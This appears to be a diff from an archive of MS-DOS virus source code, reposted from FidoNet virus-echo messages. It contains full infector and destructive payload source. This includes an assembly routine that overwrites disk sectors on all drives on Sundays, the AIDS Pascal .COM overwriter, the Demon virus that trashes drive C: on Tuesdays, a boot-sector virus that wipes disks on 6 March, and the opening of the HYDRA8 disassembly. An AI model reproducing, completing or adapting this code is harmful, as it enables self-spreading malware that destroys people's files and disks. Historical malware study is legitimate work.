mov ax,0fe05h ;fake command
jmp short $-2 ;do real commands
adc ah,3bh ;fake command
jmp short $-10 ;do real commands
push ds
xor ax,ax ;instead of XORring ax, you
;should work out it's alue
;after the above mess, then
;subtract it so noone knows
;it's real value.
push ax
mov ah,2ah ;Get system date
int 21h
cmp al,0 ;Is it Sunday?
jne not_sunday ;not sunday? no damage then..
start_damage:
mov ax,3301h ;
xor dl,dl ;determine ctrl/break state
int 21h
mov cx,msg_length ;prepare to write our messag
lea si,message ;These are the bytes to move
decrypt_message:
mov al,byte ptr [si] ;get byte to decrypt
xor al,1 ;xor it with 1
mov byte ptr [si],al ;store it
inc si ;go to next cypher
loop decrypt_message ;get another character
damage:
cmp byte ptr drive_num,27 ;have we past drive z?
ja no_more_disks ;if yes, exit damage routine
pushf ;don't let flags be altered
mov al,byte ptr drive_num
mov cx,word ptr num_secs
xor dx,dx ;first sector
lea bx,message ;data to write
int 26h ;absolute write to disk
popf ;restore flags
inc byte ptr drive_num ;try another drive
jmp short damage ;
no_more_disks:
mov dl,2ch ;check ctrl/C state
int 21h
and dl,0fh
or dl,dl ;Set Flags
je hang_machine
mov cx,1980 ;prepare system year
xor dx,dx ;prepare system month and day
mov ah,2bh ;Set system date
int 21h
xor cx,cx ;prepare system hour/minute
xor dx,dx ;prepare system seconds
mov ah,2dh ;Set system time
int 21h
mov ax,3301h ;check/set ctrl/C status
mov dl,01
int 21h
mov ax,4c00h ;Drop to DOS, no error code
int 21h
;
;
hang_machine:
jmp $
not_sunday:
mov al,dl
mov dl,0c0h
push ds
mov bx,78h
xor ax,ax
mov ds,ax ; ds=0
mov ax,word ptr [bx]
mov bx,ax
mov al,byte ptr [bx]
and al,0fh
or al,dl
mov byte ptr [bx],al
xor ah,ah ;reset drive
int 13h
pop ds ;restore ds
push ds ;keep it stored, though
mov bx,78h
xor ax,ax
mov ds,ax ;ds=0
mov ax,word ptr [bx]
mov bx,ax
mov al,byte ptr [bx]
pop ds ;restore ds
push ax
mov bx,0fah ;ultra hi speed??
mov ax,0305h ;Adjust keyboard rate/delay
int 16h
mov ax,4e00h ;DOS Search_First
lea dx,com_file ;Look for a COM file
int 21h
infect:
mov ax,4300h ;get/set file attribs
mov dx,offset victem
int 21h
mov ax,4301h ;get/set file attribs
and cx,00feh ;
int 21h
mov ax,3d01h ;open file
mov dx,offset victem
int 21h
mov bx,ax ;file handle
mov ax,5700h ;get file time
int 21h
push cx ;store it
push dx ;stor it
mov dx,0100h
mov cx,01a7h
mov ah,40h
int 21h ;write file using file handle
pop dx
pop cx
mov ax,5701h
int 21h ;set file date & time
mov ah,3eh ;close file via handle
int 21h
mov ah,4fh ;DOS Search_Next
int 21h
ja infect ;infect if good one found
int 20h ;bail out
drive_num db 0
num_secs dw 20 ;should be enough to kill with
com_file db '*.COM',0 ;'*.c*' leaves too much room
; for error.
; This was not encrypted properly!!
; I have corrected what I could figure out.
message db 0fah ;??What's this??
db 'Xntmfrsddr!' ;Youngsters
db '@f`hmrs!' ;Against
db 'Lb@eedd' ;McAffee
db '\!,'
db 'O@U@R!L@TO@T' ;NATAS KAUPAS
db 0ffh,0ffh ;spaces (cr/lf not useful...)
db 'Uid!Lhoemdrr!Whstr!w1/0!' ;virus name, version
msg_length equ $-message
virus_fix endp
mindless ends
end yam
;-+- Terminate 1.50/Pro
; + Origin: <Rudy's Place - Israel> Hard disks never die... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/P[=NNNNN] Pack code segments
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

168
MSDOS/Virus.MSDOS.Unknown.vir41.pas Normal file
View File

@ -0,0 +1,168 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 31 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : AIDS.PAS
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mike Nisbett, 2:283/718 (06 Nov 94 16:52)
;* To : Alan Jones
;* Subj : AIDS.PAS
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Nisbett@f718.n283.z2.fidonet.org
{C-}
{U-}
{I-} { Won't allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
VirusSize = 13847; { AIDS' code size }
Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record { Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(''); {Give a lot of smiles}
Writeln('');
Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @');
Writeln(' @ ATTENTION: @');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' @ collecting and executing files, you have accidentally HšKä @');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' @ be; YES, it CAN be, a ûçs has infected your system. Now what do @');
Writeln(' you have to say about that? HAHAHAHA. Have Hš¥ with this one and ');
Writeln(' @ remember, there is NO cure for @');
Writeln(' ');
Writeln(' @ ÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ @');
Writeln(' ÛÛÛ±±±±±±ÛÛÛ ±±±±ÛÛ±±±±±± ÛÛ±±±±±±±ÛÛÛ ÛÛÛ±±±±±±±ÛÛ ');
Writeln(' @ ÛÛ±± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ±± ±± @');
Writeln(' ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ');
Writeln(' @ ÛÛÛÛÛÛÛÛÛÛÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛÛÛÛÛÛÛÛÛÛÛ @');
Writeln(' ÛÛ±±±±±±±±ÛÛ± ÛÛ± ÛÛ± ÛÛ± ±±±±±±±±±ÛÛ± ');
Writeln(' @ ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± @');
Writeln(' ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛÛ± ÛÛ ÛÛÛ± ');
Writeln(' @ ÛÛ± ÛÛ± ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ±± ÛÛÛÛÛÛÛÛÛÛ±± @');
Writeln(' ±± ±± ±±±±±±±±±±±± ±±±±±±±±±±± ±±±±±±±±±± ');
Writeln(' @ @');
Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.
{ Although this is a primitive virus its effective. }
{ In this virus only the .COM }
{ files are infected. Its about 13K and it will }
{ change the date entry. }
;-+- CrossPoint v3.02
; + Origin: The Hamburger Haven 1-318-478-9940 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/A=NNNN Set NewExe segment alignment factor
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

162
MSDOS/Virus.MSDOS.Unknown.vir42.asm Normal file
View File

@ -0,0 +1,162 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 32 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : DEMON.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57)
;* To : Dr T.
;* Subj : DEMON.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Dt: 19-Oct-91 04:19
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
;By: Skin Head
;To: All
;Re: New Source Code
;========== Demon virus ==================================== 22.09.91 ========
;
; Assemble and link with: TASM DEMON.VIR
; TLINK DEMON /X/T
; Infect all .COM programs in current directory with: DEMON
;
; !!! NOT ON A TUESDAY !!!
;
;-------------- Constants and structures
Tuesday = 2 ; INT 21h, AH=2Ah
Search_Rec struc ; directory search record
db 21 dup (?) ; reserved for DOS
FileAttr db ? ; file attribute
FileTime dw ? ; packed file time
FileDate dw ? ; packed file date
FileSize dd ? ; long file size
FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT
Search_Rec ends
;-------------- Demon virus segment
Virus segment
assume cs:Virus,ds:Virus,es:Virus,ss:Virus
org 0080h
DTA Search_Rec <> ; disk transfer area
org 0100h
Demon: ; virus entry point
Virus_Size = Virus_End - Demon ; virus size = 272 bytes
mov dx,offset All_COM ; find first .COM file,
mov ah,4eh ; including hidden/system
mov cx,110bh
int 21h
nop
jnc Infect ; abort if no files found
jmp short Check_Day
Infect: call Replicate ; overwrite first 272 bytes
mov dx,offset DTA
mov ah,4fh ; find next .COM file,
int 21h ; go check day if none found
nop ; else repeat
jnc Next_File
jmp short Check_Day
Next_File: jmp Infect
Check_Day: mov ah,2ah ; get DOS date, check day
int 21h
cmp al,Tuesday ; Tuesday ?
je Thrash_Drive ; if yes, thrash drive C:
mov ah,4ch ; else exit to DOS
int 21h
Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors
jmp Write_Sectors ; of drive C: with garbage
Write_Sectors: mov al,Drive_C ; Error: doesn't work !
mov cx,160 ; AL=C:, CX=160 sectors
mov dx,0 ; DX=highest sector in drive !
mov bx,0 ; DS:BX=start of PSP area
int 26h ; overwrite sectors
inc Counter
cmp Counter,10 ; repeat 10 times
je Show_Msg
jne Write_Sectors
Show_Msg: mov ah,09h ; show a fake error message
mov dx,offset Virus_Msg ; and exit to DOS
int 21h
mov ah,4ch
int 21h
Replicate: mov dx,offset DTA.FileName ; save file attribute
mov ax,4300h
int 21h
mov COM_Attr,cx
nop
xor cx,cx ; unprotect the .COM file
mov ax,4301h ; in case it's read-only
int 21h
nop
mov ax,3d02h ; open .COM file for R/W,
int 21h ; abort on error
nop
jc Check_Day
mov bx,ax ; BX = file handle
mov ax,5700h
int 21h ; save file date and time
nop
mov COM_Time,cx
mov COM_Date,dx
mov dx,offset Demon ; overwrite first 272 bytes
mov ah,40h ; of .COM program file
mov cx,Virus_Size ; with the virus code
int 21h
nop
mov ax,5701h ; restore file date and time
mov dx,COM_Date
mov cx,COM_Time
int 21h
mov ah,3eh ; close the file
int 21h
nop
mov dx,offset DTA.FileName ; restore file attribute
mov cx,COM_Attr
mov ax,4301h
int 21h
retn
All_COM db '*.COM',0 ; dir search specification
COM_Date dw 0 ; packed .COM program date
COM_Time dw 0 ; packed .COM program time
COM_Attr dw 0 ; .COM program file attribute
Counter db 0 ; used when thrashing drive C:
Drive_C db 2 ; INT 26h C: drive number
dw 0
Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'
dw 0
Virus_Msg db 10,13,'Error eating drive C:',10,13,'$'
Virus_End label byte ; virus code+data end
Virus ends
end Demon
;-+- FastEcho/386 1.41.b7/Real
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

251
MSDOS/Virus.MSDOS.Unknown.vir43.asm Normal file
View File

@ -0,0 +1,251 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 33 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MICHANGL.A1
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 16:58)
;* To : Mike Salvino
;* Subj : MICHANGL.A1
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
obsluha 13h: push ds
push ax
or dl,dl ; drive a: ?
jnz loc_1 ; ak nie, stara obsluha
xor ax,ax ; ak ano, pozri ci motor bezi
mov ds,ax ; (ked bezi, tak by odbiehanie
; na boot sektor bolo napadne
; - hrcal by disk, pri zapnuti
; sa to strati)
test byte ptr ds:[43Fh],1 ; (0000:043F=10h)
jnz loc_1 ; ak bezi, tak stara obsluha
pop ax ; ak nebezi, tak stara obsluha
pop ds
pushf
call dword ptr cs:[0Ah]
pushf ; Push flags
call sub_1 ; rozmnoz sa na a:
popf ; Pop flags
retf 2 ; vrat sa z int s tymito flagmi
loc_1:
pop ax
pop ds
jmp dword ptr cs:[0Ah] ; stara obsluha
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; MNOZENIE SA
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
push ax ; SCHOVAJ REGS
push bx
push cx
push dx
push ds
push es
push si
push di
push cs
pop ds
push cs
pop es
mov si,4
loc_2:
mov ax,201h ; 1 sektor citaj
mov bx,200h ; za seba (si 512 b. dlhy)
mov cx,1 ; boot sektor (1. na 0. stope)
xor dx,dx ; disk a:
pushf
call dword ptr ds:[0Ah] ; stara obsluha
jnc loc_3 ; error ?
xor ax,ax ; error - disk reset
pushf ;
call dword ptr ds:[0Ah] ; (6C20:000A=0AF1Ah)
dec si
jnz loc_2 ; skus to 4 x
jmp short loc_6 ; a ked nic, vykasli sa na to
loc_3:
xor si,si ; vsetko ok, pokracujeme
cld
lodsw ; porovnaj prve 4 byte z bootu
cmp ax,[bx] ; so sebou, aby si zistil, ci
jne loc_4 ; uz si tam - nakazeny disk
lodsw
cmp ax,[bx+2]
je loc_6 ; ak si tam, netrba infikovat
; "AIDS staci dostat raz."
loc_4:
mov ax,301h ; avsak ak tam nie si, tak
mov dh,1 ; ten disk nakaz
mov cl,3 ; nastav znacku, kam odlozit
cmp byte ptr [bx+15h],0FDh ; povodny boot
je loc_5 ; (do ktoreho sektora)
mov cl,0Eh ; podla typu diskety
loc_5: ; (0e - HD, 3 - DD, 7 - hard)
mov word ptr ds:[8],cx ; uloz znacku
pushf ; a zapis povodny boot
call dword ptr ds:[0Ah]
jc loc_6 ; error - neda sa - vyskoc von
mov si,3BEh ; dopis originalnu partition
mov di,1BEh ; na svoj koniec
mov cx,21h
cld
rep movsw
mov ax,301h ; a zapis sa do bootu
xor bx,bx
mov cx,1
xor dx,dx
pushf ; cez staru int 13h
call dword ptr ds:[0Ah]
loc_6:
pop di ; hotovo - koniec
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
retn
sub_1 endp
START VIRUSU xor ax,ax
mov ds,ax ; DS NA NULU
cli ; Disable interrupts
mov ss,ax ; stack pod seba
mov ax,7C00h ; tu si - natiahol si sa
mov sp,ax ; z bootu - sp pod seba
sti ; Enable interrupts
push ds ; schovaj ds,ax
push ax
mov ax,word ptr ds:[4Ch] ; odloz si staru obsluhu int13h
mov word ptr ds:[7C0Ah],ax
mov ax,word ptr ds:[4Eh]
mov word ptr ds:[7C0Ch],ax
mov ax,word ptr ds:[413h] ; top of memory zmensi o 2K
dec ax
dec ax
mov word ptr ds:[413h],ax
mov cl,6 ; prepocitaj na paragr. adr.
shl ax,cl
mov es,ax ; nastav es
mov word ptr ds:[7C05h],ax ; a odloz si ju sem
mov ax,0Eh ; toto je offset noveho int13h
mov word ptr ds:[4Ch],ax ; nastav ten novy int
mov word ptr ds:[4Eh],es
mov cx,1BEh ; skopiruj sa do vyhr. 2K pam.
mov si,7C00h
xor di,di
cld
rep movsb
jmp dword ptr cs:[7C03h] ; a skoc na seba po skopirovani
xor ax,ax ; sem skocis
mov es,ax ; 0 do es
int 13h ; reset disk a:
push cs ; cs do ds
pop ds
mov ax,201h ; precitaj boot
mov bx,7C00h ; do 7c00
mov cx,word ptr ds:[8] ; pozri si znacku, kde mas ulo-
; zeny povodny boot
cmp cx,7 ; ak je to 7 - tak si na harde
jne loc_7 ; inak si na diskete
mov dx,80h ; na harde - c:
int 13h ; precitaj originalny boot
jmp short loc_8 ; a pokracuj
loc_7:
mov cx,word ptr ds:[8] ; precitaj si kde mas boot
mov dx,100h ; z diskety
int 13h
jc loc_8 ; error - nejde to - skonci
push cs ; ak to ide cs do es
pop es
mov ax,201h ; a precitaj si este boot
mov bx,200h ; za seba
mov cx,1
mov dx,80h ; ale z hardu
int 13h
jc loc_8 ; chyba - von
xor si,si ; porovnaj sa s bootom
cld ; ci je harddisk nakazeny
lodsw
cmp ax,[bx]
jne loc_13
lodsw
cmp ax,[bx+2]
jne loc_13 ; ak nie je nakazeny - nakaz
loc_8:
xor cx,cx ; 0 do cx
mov ah,4
int 1Ah ; pozri si datum
; ci je 6. 3.
cmp dx,306h
je loc_9 ; ak je 6.3. - akcia
retf ; ak nie - von
loc_9:
xor dx,dx ; TOT' UCINOK VIRUSU
mov cx,1 ; zacni na 0. stope a 1. sktr
loc_10:
mov ax,309h ; zapis 9 sektorov
mov si,word ptr ds:[8] ; pozri typ disku
cmp si,3 ; disketa -> rovno zapis
je loc_11
mov al,0Eh ; HD disketa -> 14 sektorov
cmp si,0Eh
je loc_11 ; a rovno zapis
mov dl,80h ; nie disketa - hard
mov byte ptr ds:[7],4 ; tak nie 2, ale 4 hlavy
mov al,11h ; a 17 sektorov/ track
loc_11:
mov bx,5000h ; zober hocico z pamati
mov es,bx
int 13h ; a zapis na disk
jnc loc_12 ; nie je chyba - pokracuj
xor ah,ah ; chyba - reset disk
int 13h
loc_12:
inc dh ; dalsia hlava ?
cmp dh,byte ptr ds:[7] ; max. headroom
jb loc_10 ; este nie - pokracuj
xor dh,dh ; ano - opat hlava 0
inc ch ; dalsi track
jmp short loc_10 ; a znova
loc_13:
mov cx,7 ; NAKAZENIE HARDU
mov word ptr ds:[8],cx ; sem uloz povodny boot
mov ax,301h
mov dx,80h
int 13h
jc loc_8 ; error - out
mov si,3BEh ; no error - dopis partition
mov di,1BEh
mov cx,21h
rep movsw
mov ax,301h ; a zapis sa do bootu
xor bx,bx
inc cl
int 13h
jmp short loc_8 ; a chod von
-+- DinoMail v.1.0 Alpha
+ Origin: I just hate people who create virusses... (2:283/718)
=============================================================================
Yoo-hooo-oo, -!
þ The MeÂeO
/Txx Specify output file type
--- Aidstest Null: /Kill
* Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

266
MSDOS/Virus.MSDOS.Unknown.vir44.asm Normal file
View File

@ -0,0 +1,266 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 34 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HYDRA_8.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:59)
;* To : Brad Frazee
;* Subj : HYDRA_8.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA8 ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛ Disassembly by: -=>Wasp<=- aka >>Night Crawler<< ÛÛ
;ÛÛ ÛÛ
;ÛÛ Reassemble with TASM 2.0 ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
DATA_1E EQU 80H
DATA_16E EQU 1EFH
DATA_17E EQU 1F2H
DATA_18E EQU 9D9AH
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
HYDRA8 PROC FAR
START:
JMP LOC_2 ; (01E2)
DB 59H, 44H, 00H, 00H
DATA_4 DB 'HyDra-8 Beta - Not For Release'
DB '. *.CO?'
DB 0
DATA_7 DW 0, 84FCH
DATA_9 DW 0
DATA_10 DB 0
DB 29 DUP (0)
DATA_11 DB 0
DB 0, 0, 0, 0, 0, 0
DATA_12 DB 0
DB 0, 0, 0, 0, 0, 0
COPYRIGHT DB 'Copyright (c)'
DB ' 1991 by C.A.V.E. '
DATA_13 DB 2AH
DB 2EH, 45H, 58H, 45H, 00H
DATA_14 DB 33H
DB 0C9H, 1EH, 52H,0E8H, 06H, 00H
DB 0E8H, 13H, 00H,0EBH, 36H, 90H
DB 0BEH, 48H, 01H,0BFH, 5AH, 01H
DB 0B9H, 12H, 00H
LOCLOOP_1:
XOR BYTE PTR [SI],0F5H
MOVSB ; Mov [si] to es:[di]
LOOP LOCLOOP_1 ; Loop if cx > 0
RETN
MOV AX,0F00H
INT 10H ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
MOV AH,0
INT 10H ; Video display ah=functn 00h
; set display mode in al
MOV AX,200H
MOV DH,0CH
MOV DL,1FH
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
XOR DX,DX ; Zero register
